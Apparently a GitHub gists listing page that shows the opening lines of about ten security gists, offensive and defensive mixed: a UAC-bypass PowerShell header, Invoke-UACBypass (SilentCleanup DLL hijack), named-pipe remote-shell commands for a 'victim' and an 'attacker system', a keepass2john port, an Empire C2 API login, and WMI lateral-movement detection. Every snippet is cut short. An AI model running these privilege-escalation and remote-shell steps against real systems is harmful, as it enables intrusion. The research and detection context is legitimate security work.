This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// see https://play.golang.org/p/6YD4YdvGLr | |
// for an example | |
import ( | |
"reflect" | |
"unicode" | |
"unicode/utf8" | |
) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
# ./keepass2john.c was released under the GNU General Public License | |
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
# | |
# Python port by @harmj0y, GNU General Public License | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Author: Matthew Graeber (@mattifestation) | |
License: BSD 3-Clause | |
#> | |
function Get-WmiNamespace { | |
[OutputType([String])] | |
Param ( | |
[String] | |
[ValidateNotNullOrEmpty()] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# start empire headless with the specified API username and password | |
./empire --headless --username empireadmin --password 'Password123!' | |
# login and the current server token | |
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}' | |
# store the token in a variable | |
TOKEN=<API_token> | |
# see listener options |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Define the signature - i.e. __EventFilter | |
$EventFilterArgs = @{ | |
EventNamespace = 'root/cimv2' | |
Name = 'LateralMovementEvent' | |
Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
QueryLanguage = 'WQL' | |
} | |
$InstanceArgs = @{ | |
Namespace = 'root/subscription' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#region Scriptblocks that will execute upon alert trigger | |
$LateralMovementDetected = { | |
$Event = $EventArgs.NewEvent | |
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED) | |
$MethodName = $Event.MethodName | |
$Namespace = $Event.Namespace | |
$Object = $Event.ObjectPath | |
$User = $Event.User |